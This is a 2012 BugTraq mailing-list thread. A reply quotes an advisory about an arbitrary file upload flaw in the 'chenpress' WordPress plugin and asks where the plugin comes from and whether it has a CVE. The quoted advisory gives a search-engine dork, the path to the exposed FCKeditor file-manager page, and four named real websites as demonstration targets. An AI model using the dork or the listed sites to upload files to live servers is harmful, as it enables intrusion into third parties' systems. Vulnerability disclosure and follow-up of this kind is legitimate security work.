BugTraq
Wordpress (chenpress Plugin) Arbitrary File Upload Vulnerability Jul 21 2012 07:50AM
Amir irist ir (1 replies)
Re: Wordpress (chenpress Plugin) Arbitrary File Upload Vulnerability Jul 24 2012 07:01AM
Henri Salo (henri nerv fi)
On Sat, Jul 21, 2012 at 07:50:54AM +0000, Amir (at) irist (dot) ir [email concealed] wrote:
> a bug in Wordpress (chenpress Plugin) that allows to us to occur
> a File Upload on a Remote machin.
>
>
>
>
>
>
> ########################################################################
################
> #
> # Exploit Title : Wordpress (chenpress Plugin) Arbitrary File Upload Vulnerability
> #
> # Author : IrIsT.Ir
> #
> # Discovered By : Am!r
> #
> # Home : http://IrIsT.Ir/forum
> #
> # Software Link : http://wordpress.org
> #
> # Security Risk : High
> #
> # Version : All Version
> #
> # Tested on : GNU/Linux Ubuntu - Windows Server - win7
> #
> # Dork : inurl:"wp-content/plugins/chenpress"
> #
> ########################################################################
################
> #
> # Expl0iTs :
> #
> # http://target.com/wp-content/plugins/chenpress/FCKeditor/editor/filemana
ger/browser/mcpuk/browser.html
> #
> #
> # D3mo :
> #
> # butcherboysonline.com/wp-content/plugins/chenpress/FCKeditor/editor/file
manager/browser/mcpuk/browser.html
> #
> # atletismosuanzes.com/wp-content/plugins/chenpress/FCKeditor/editor/filem
anager/browser/default/browser.html
> #
> # carnadas.org/blog/wp-content/plugins/chenpress/FCKeditor/editor/filemana
ger/browser/default/browser.html
> #
> # downtheaisle.ca/wp-content/plugins/chenpress/FCKeditor/editor/filemanage
r/browser/default/browser.html
> #
> ########################################################################
################
> #
> # Greats : B3HZ4D - Crim3R - nimaarek - 0x0ptim0us - R3ZA BLACK HAT - TaK.FaNaR - m3hdi - F@rid
> #
> # H4x0r - dr.tofan - skote_vahshat - d3c0d3r - Dr.Security - Mr.Xpr - Bl4ck_king - hellboy
> #
> # Siamak_Black - Shekaf & All Members In IrIsT.Ir
> #
> ########################################################################
################

This plugin is not in the official WordPress plugins repository. Where can it be downloaded? Does this vulnerability have CVE-identifier?

- Henri Salo

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus